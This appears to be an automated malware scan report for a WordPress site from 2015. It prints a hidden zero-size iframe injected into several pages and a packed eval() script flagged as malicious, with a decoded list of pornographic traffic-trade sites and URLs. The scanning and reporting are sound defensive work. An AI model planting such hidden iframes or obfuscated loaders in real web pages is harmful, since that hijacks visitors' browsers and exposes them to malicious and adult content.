Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=haode.yi.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://haode.yi.org/ | 200 OK Content-Length: 37255 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 src: http://s1.slimtrade.com/out.php?s=6871/ <iframe src="http://s1.slimtrade.com/out.php?s=6871/"
sandbox="allow-scripts allow-same-origin"
id="iframe" seamless
width="0%" height="0px"
style="border: 0px solid #dcdcdc;"> | ||
http://haode.yi.org/wp-includes/js/jquery/jquery.js?ver=1.11.2 | 200 OK Content-Length: 95952 Content-Type: application/x-javascript | clean |
http://haode.yi.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/x-javascript | clean |
http://s1.slimtrade.com/s6871.js | 200 OK Content-Length: 15157 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: haode.yi.org eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('e q=J 1m("4w X 4y (1B)","4z 4C (1g)","2U (73)","2J (68)","4V 4T 4W (62)","2K (51)","4X 5b 4G (51)","4P 4a (35)","3B 3E (25)","3n 3t 4g (10)","3K 3Y 4b (9)","4c 3O (4)","2H (3)","2P. (1)","2O (0)","3R 6m (0)");e C=J 1m("g://6i.k/?1x=B.y.G" ...[3551 bytes skipped]... Decoded script: var stTrName=new Array("Porn X Clips (613)","Cute List (117)","exnovias (73)","newmodim (68)","Videos porno brasi (62)","analmovietubes (51)","Porca Vacca Sexy (51)","Free Gfpics (35)","Cine Amador (25)","Floga To Tube (10)","ONLY PRETTY TEENS (9)","Vadias Amadoras (4)","sungalleries (3)","top. (1)","ninfetafogosa (0)","Youjizz Italiano (0)");var stTrUrl=new Array("http://pornxclips.com/?id=haode.yi.org","http://cutelist.in/img","http://www.exnovias.net","http://www.newmodim.com/?ft=haode.yi.org","http://www.pornobrasil.xxx","http://analmovietubes.com/?id=haode.yi.org","http://porcavacca.the-chan.com","http://www.freetinygirls.net","http://cineamador.com","http://www.flogato.com","http://onlyprettyteens.info","http://vadiasamadoras.com","http://www.sungalleries.com/teens.html?f=haode.yi.org","http://top.prettymodels.in/?id=haode.yi.org"," ...[27814 bytes skipped]... | ||
http://cdn.popcash.net/pop.js | 200 OK Content-Length: 2863 Content-Type: application/x-javascript | clean |
http://haode.yi.org/dt.js | 200 OK Content-Length: 15465 Content-Type: application/x-javascript | clean |
http://spaces.slimspots.com/adspace/17634.js?wsid= | 200 OK Content-Length: 1313 Content-Type: text/javascript | clean |
http://portaldaputaria.org/scripts/flutuante.js | 200 OK Content-Length: 1912 Content-Type: application/javascript | clean |
http://haode.yi.org/wp-content/themes/asteroid/includes/nav-toggle.js?ver=1.1.9 | 200 OK Content-Length: 373 Content-Type: application/x-javascript | clean |
http://haode.yi.org/?cat=5 | 200 OK Content-Length: 36956 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 src: http://s1.slimtrade.com/out.php?s=6871/ <iframe src="http://s1.slimtrade.com/out.php?s=6871/"
sandbox="allow-scripts allow-same-origin"
id="iframe" seamless
width="0%" height="0px"
style="border: 0px solid #dcdcdc;"> | ||
http://haode.yi.org/?cat=3 | 200 OK Content-Length: 36952 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 src: http://s1.slimtrade.com/out.php?s=6871/ <iframe src="http://s1.slimtrade.com/out.php?s=6871/"
sandbox="allow-scripts allow-same-origin"
id="iframe" seamless
width="0%" height="0px"
style="border: 0px solid #dcdcdc;"> | ||
http://haode.yi.org/?cat=2 | 200 OK Content-Length: 36936 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 src: http://s1.slimtrade.com/out.php?s=6871/ <iframe src="http://s1.slimtrade.com/out.php?s=6871/"
sandbox="allow-scripts allow-same-origin"
id="iframe" seamless
width="0%" height="0px"
style="border: 0px solid #dcdcdc;"> | ||
http://haode.yi.org/?cat=7 | 200 OK Content-Length: 36952 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 src: http://s1.slimtrade.com/out.php?s=6871/ <iframe src="http://s1.slimtrade.com/out.php?s=6871/"
sandbox="allow-scripts allow-same-origin"
id="iframe" seamless
width="0%" height="0px"
style="border: 0px solid #dcdcdc;"> | ||
http://haode.yi.org/?p=309 | 200 OK Content-Length: 18817 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 src: http://s1.slimtrade.com/out.php?s=6871/ <iframe src="http://s1.slimtrade.com/out.php?s=6871/"
sandbox="allow-scripts allow-same-origin"
id="iframe" seamless
width="0%" height="0px"
style="border: 0px solid #dcdcdc;"> | ||
http://haode.yi.org//a.yesadsrv.com/display.php?nid=4&zone=84072&type=banner&sid=60010&pid=18050&subid=&opt1=&opt2=/ | 404 Not Found Content-Length: 586 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: haode.yi.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 28 Apr 2015 23:03:13 GMT
Server: kangle/3.4.6
Content-Type: text/html; charset=UTF-8
X-Pingback: http://haode.yi.org/xmlrpc.php
X-Powered-By: PHP/5.3.3
GET / HTTP/1.1
Host: haode.yi.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 28 Apr 2015 23:03:13 GMT
Server: kangle/3.4.6
Content-Type: text/html; charset=UTF-8
X-Pingback: http://haode.yi.org/xmlrpc.php
X-Powered-By: PHP/5.3.3
Second query (visit from search engine):
GET / HTTP/1.1
Host: haode.yi.org
Referer: http://www.google.com/search?q=haode.yi.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: haode.yi.org
Referer: http://www.google.com/search?q=haode.yi.org
Result:
The result is similar to the first query. There are no suspicious redirects found.